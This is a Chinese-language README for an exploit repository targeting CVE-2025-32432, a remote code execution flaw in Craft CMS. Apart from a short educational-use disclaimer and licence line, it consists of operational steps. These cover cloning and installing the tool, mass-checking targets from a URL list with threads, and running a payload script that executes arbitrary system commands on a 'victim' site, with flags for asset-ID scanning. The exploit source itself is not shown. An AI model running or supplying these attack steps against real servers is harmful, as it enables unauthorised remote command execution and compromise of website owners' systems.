原始概念验证的清理和改进版本
该项目基于 MIT 许可证。
查看 LICENSE 文件了解更多详情。
此PoC 仅用于教育目的和授权的测试(CTF、拥有明确书面许可的安全审计)。
未经授权在系统上使用是非法的。作者对任何滥用行为不承担责任。
craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# 或使用列表
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → 目标URL (必需)
-c, --cmd → 要执行的系统命令 (必需)
-a, --asset → 已知的有效AssetId (可选)
-s, --scan-max → 最大扫描assetId (默认: 300)